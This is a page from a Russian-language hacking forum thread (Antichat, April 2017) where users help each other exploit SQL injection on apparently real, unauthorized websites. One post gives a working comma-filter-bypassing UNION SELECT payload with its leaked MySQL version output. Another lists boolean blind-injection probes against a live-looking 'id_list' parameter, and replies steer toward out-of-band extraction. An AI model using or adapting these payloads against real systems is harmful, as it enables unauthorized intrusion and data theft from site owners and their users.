HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 184 из 296 « Первая < 84134174 180 181 182 183 184 185 186 187 188 194234284 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.04.2017, 14:49
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию
Цитата:
Сообщение от DezMond™  

а дальше? какой толк подбирать колонки, если нет вывода?
вывод может и есть, запятая похоже опять фильтруется
 
Ответить с цитированием

  #2  
Старый 07.04.2017, 15:06
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию
Цитата:
Сообщение от DezMond™  

а дальше? какой толк подбирать колонки, если нет вывода?
Код:
union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k/**/join/**/(select/**/12)kq/**/join/**/(select/**/13)kz/**/join/**/(select/**/14)kr/**/join/**/(select/**/15)kt/**/join/**/(select/**/16)ky/**/join/**/(select/**/17)ki/**/join/**/(select/**/18)kk/**/join/**/(select/**/19)ko/**/join/**/(select/**/20)ka/**/join/**/(select/**/21)kqq/**/join/**/(select/**/version())kee/**/join/**/(select/**/23)kaa/**/join/**/(select/**/24)kbbb+--+s
5.6.19-67.0-log
 
Ответить с цитированием

  #3  
Старый 07.04.2017, 19:28
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию
Цитата:
Сообщение от ACat  

mysqli_real_escape_string
а вы как думаете?
Если бы у меня было известное решение, то, наверное, я бы не спрашивал.

В любом случае, спасибо за ответ.
 
Ответить с цитированием

  #4  
Старый 07.04.2017, 22:55
ACat
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
Провел на форуме:
60408

Репутация: 0
По умолчанию
Цитата:
Сообщение от t0ma5  

Код:
union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k/**/join/**/(select/**/12)kq/**/join/**/(select/**/13)kz/**/join/**/(select/**/14)kr/**/join/**/(select/**/15)kt/**/join/**/(select/**/16)ky/**/join/**/(select/**/17)ki/**/join/**/(select/**/18)kk/**/join/**/(select/**/19)ko/**/join/**/(select/**/20)ka/**/join/**/(select/**/21)kqq/**/join/**/(select/**/version())kee/**/join/**/(select/**/23)kaa/**/join/**/(select/**/24)kbbb+--+s
5.6.19-67.0-log
ax*eть.

Парни подскажите, если есть иньекция но сервер на генту и не возвращает никаких ошибок как действовать??
 
Ответить с цитированием

  #5  
Старый 08.04.2017, 04:52
ACat
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
Провел на форуме:
60408

Репутация: 0
По умолчанию
Вернее что бы не быть голословным вот реальный пример:

?id_list=359982' or 1=1 -- 'a --> вывод

?id_list=359982' or 1=2 -- 'a --> 404

?id_list=359982' ORDER BY 1 -- 'a --> 404

?id_list=359982' GROUP BY 1 -- 'a --> 404

Напомню что ошибки не отображаются.

Эни айдиас?
 
Ответить с цитированием

  #6  
Старый 08.04.2017, 13:46
qqq1457
Познающий
Регистрация: 13.10.2016
Сообщений: 33
Провел на форуме:
8589

Репутация: 0
По умолчанию
Цитата:
Сообщение от ACat  

Вернее что бы не быть голословным вот реальный пример:
?id_list=359982' or 1=1 -- 'a --> вывод
?id_list=359982' or 1=2 -- 'a --> 404
?id_list=359982' ORDER BY 1 -- 'a --> 404
?id_list=359982' GROUP BY 1 -- 'a --> 404
Напомню что ошибки не отображаются.
Эни айдиас?
это blind sql

Про инекции и Способы обнаружения Blind SQL-инъекций:

https://www.ptsecurity.com/upload/co...-Injection.pdf

софт:/threads/240692/

или ручками крути
 
Ответить с цитированием

  #7  
Старый 08.04.2017, 15:21
ACat
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
Провел на форуме:
60408

Репутация: 0
По умолчанию
Цитата:
Сообщение от qqq1457  

это blind sql
Про инекции и Способы обнаружения Blind SQL-инъекций:
https://www.ptsecurity.com/upload/co...-Injection.pdf
софт:
/threads/240692/
или ручками крути
да, это я понимаю. но там такой сервер, что блайндом его всё лето можно взламывать
 
Ответить с цитированием

  #8  
Старый 08.04.2017, 15:22
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию
Цитата:
Сообщение от ACat  

да, это я понимаю. но там такой сервер, что блайндом его всё лето можно взламывать
Тогда кури в сторону ООБ
 
Ответить с цитированием

  #9  
Старый 08.04.2017, 18:21
ACat
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
Провел на форуме:
60408

Репутация: 0
По умолчанию
Цитата:
Сообщение от BabaDook  

Тогда кури в сторону ООБ
прошу прощения, а что такое ООБ?
 
Ответить с цитированием

  #10  
Старый 08.04.2017, 20:12
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
Цитата:
Сообщение от ACat  

прошу прощения, а что такое ООБ?
http://www.blackhat.com/presentatio...-europe-09-Damele-SQLInjection-whitepaper.pdf

Все подробно и ясно - Page №22
 
Ответить с цитированием
Ответ
Страница 184 из 296 « Первая < 84134174 180 181 182 183 184 185 186 187 188 194234284 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.